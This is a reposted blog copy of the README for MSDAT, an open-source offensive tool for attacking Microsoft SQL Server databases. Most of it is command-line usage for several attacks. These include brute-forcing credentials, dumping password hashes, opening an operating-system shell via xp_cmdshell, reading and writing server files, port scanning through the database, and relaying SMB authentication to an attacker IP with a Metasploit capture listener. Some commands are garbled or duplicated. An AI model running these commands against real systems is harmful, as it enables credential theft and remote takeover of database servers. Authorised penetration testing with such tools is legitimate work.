MSDAT - Microsoft SQL Database Attacking Tool
MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.
Usage examples of MSDAT:
- You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the database
- You have a valid Microsoft SQL account on a database and you want to escalate your privileges
- You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)
Tested on Microsof SQL database 2005, 2008 and 2012.
Changelog
- Version 1.0 (2017/02/15) :
- first version realeased
Features
Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:
- get technical information (ex: database version) of a MSSQL database without to be authenticated
- search MSSQL accounts with a dictionnary attack
- test each login as password (authentication required)
- get a windows shell on the database server with
- xp_cmdshell
- download files remotely with:
- OLE Automation
- bulkinsert
- openrowset
- upload files on the server with:
- OLE Automation
- openrowset
- capture a SMB authentication thanks to:
- bulkinsert
- openrowset
- xp_dirtree
- xp_fileexist
- xp-getfiledetails
- steal MSSQL hashed password, on an any MSSQL version
- scan ports through the database:
- openrowset
- execute SQL requests on a remote MSSQL server trough the database (target) with:
- bulkinsert
- openrowset
- list files/directories with:
- xp_subdirs
- xp_dirtree
- list drives/medias with:
- xp_fixeddrives
- xp_availablemedia
- create folder with:
- xp_create_subdir
Installation
Some dependancies must be installed in order to run MSDAT.
In ubuntu:
sudo apt-get install freetds-dev
sudo pip install cython colorlog termcolor pymssql argparse
sudo pip install argcomplete && sudo activate-global-python-argcomplete
[global]
# TDS protocol version
tds version = 8.0
use ntlmv2 = yes
Examples
Modules
- You can list all modules:
./msdat.py -h
- When you have chosen a module (example: all), you can use it and you can list all features and options of the module:
./msdat.py all -h
all module
The all module allows you to run all modules (depends on options that you have purchased).
python msdat.py all -s $SERVER
- to use your own account file for the dictionnary attack
- try multiple passwords for a user without ask you
- to define your own timeout value
./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry
mssqlinfo module
To get technical information about a remote MSSQL server without to be authenticated:
./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info
passwordguesser module
This module allows you to search valid credentials :
./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search
You can specify your own account file with the --accounts-file option:
./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry
passwordstealer module
To dump hashed passwords :
./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt
xpcmdshell module
To execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell
If xp_cmdshell is not enabled, the --enable-xpcmdshell can be used in this module to activate it:
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --disable-xpcmdshell --shell
The --disable-xpcmdshell option disables xp_cmdshell if this one is enabled.
smbauthcapture module
Thanks to this module, you can capture a SMB authentication:
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHARE
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit
If you want to choose the SMB authentication procedure to capture the authentication:
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-dirtree-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-fileexist-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-getfiledetails-capture 127.0.0.1
oleautomation module
This module can be used to read/write file in the database server.
The following command read the file temp.txt stored in the database server:
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-file temp.txt 'C:\Users\Administrator\Desktop\temp.txt
bulkopen module
The module bulkopen can be used :
- to read/download files stored on a database server
- to scan ports through the database server
- to execute SQL requests on a remote MSSQL server through the database
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'"
- bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) or
- openrowset(https://msdn.microsoft.com/en-us/library/ms190312.aspx)):
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt' --method openrowset
This module can be used to scan ports (1433 and 1434 of 127.0.0.1) through the database server:
```bash
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433,1434 -v
You can scan a range of ports:./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433-1438
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD 'select @@ServerName'
xpdirectory module
The module xpdirectory can be used:
- to list:
- files
- directories
- drives
- to check if a file exists
- to create a directory
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-files 'C:\'
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-dir 'C:\'
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-fixed-drives --list-available-media
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --file-exists 'C:\' --file-exists 'file.txt'
./msdat.py xpdirectory --s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --create-dir 'C:\temp'
search module
The module search can be used to search a pattern in column names of tables and views. Usefull to search the pattern %password% in column names for example.
To get column names which contains password patterns (ex: passwd, password, motdepasse, clave):
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns
To search a specific pattern in column names of views and tables:
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns
Via: feedproxy.google.com
MSDAT - Microsoft SQL Database Attacking Tool
Reviewed by Anónimo
on
10:15
Rating: